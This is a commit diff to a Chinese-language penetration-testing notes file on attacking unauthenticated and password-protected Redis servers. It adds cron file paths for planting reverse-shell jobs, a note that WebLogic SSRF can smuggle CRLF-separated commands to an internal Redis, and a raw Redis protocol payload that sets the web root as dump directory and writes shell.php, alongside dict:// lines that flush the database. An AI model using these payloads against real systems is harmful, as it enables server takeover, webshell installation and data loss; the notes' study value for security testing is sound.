Update redis.md

Author: safe6Sec

redis.md

@@ -58,7 +58,14 @@ save
 
 
 
-tips:**crontab反弹debian,ubuntu都不行**，因为他们对计划任务的格式很严格，必须要执行 `crontab -u root /var/spool/cron/crontabs/root` 通过语法检查后，才能执行计划任务。
+tips:**crontab反弹debian,ubuntu都不行**，因为他们对计划任务的格式很严格，必须要执行 `crontab -u root /var/spool/cron/crontabs/root` 通过语法检查后，才能执行计划任务。    
+
+最后补充一下，可进行利用的cron有如下几个地方：
+
+- /etc/crontab 这个是肯定的
+- /etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖任何其他文件的情况进行弹shell。
+- /var/spool/cron/root centos系统下root用户的cron文件
+- /var/spool/cron/crontabs/root debian系统下root用户的cron文件
 
 
 
@@ -160,7 +167,8 @@ https://github.com/learner-ing/redis-rce
 
 # Other
 
-ssrf 攻击redis
+## ssrf 攻击未授权访问redis
+
 ```
 # 清空 key
 dict://172.72.23.27:6379/flushall
@@ -179,6 +187,54 @@ dict://172.72.23.27:6379/save
 
 ```
 
+如果是Weblogic的SSRF有一个比较大的特点，其虽然是一个“GET”请求，但是我们可以通过传入%0a%0d来注入换行符，而某些服务（如redis）是通过换行符来分隔每条命令，也就说我们可以通过该SSRF攻击内网中的redis服务器。见ref  
+
+
+
+## ssrf 攻击需要验证redis
+可以看到每行都是以\r结尾的，但是 Redis 的协议是以 CRLF (\r\n)结尾，所以转换的时候需要把\r转换为\r\n，然后其他全部进行 两次 URL 编码
+```
+*2\r
+$4\r
+auth\r
+$8\r
+P@ssw0rd\r
+*1\r
+$8\r
+flushall\r
+*4\r
+$6\r
+config\r
+$3\r
+set\r
+$3\r
+dir\r
+$13\r
+/var/www/html\r
+*4\r
+$6\r
+config\r
+$3\r
+set\r
+$10\r
+dbfilename\r
+$9\r
+shell.php\r
+*3\r
+$3\r
+set\r
+$1\r
+x\r
+$25\r
+
+
+\r
+*1\r
+$4\r
+save\r  
+
+```
+
 
 
 
@@ -188,3 +244,5 @@ dict://172.72.23.27:6379/save
 # References
 - https://djhons.com/2021/10/29/61.html
 - https://www.anquanke.com/post/id/214108
+- https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf
+- https://www.sqlsec.com/2021/05/ssrf.html#toc-heading-25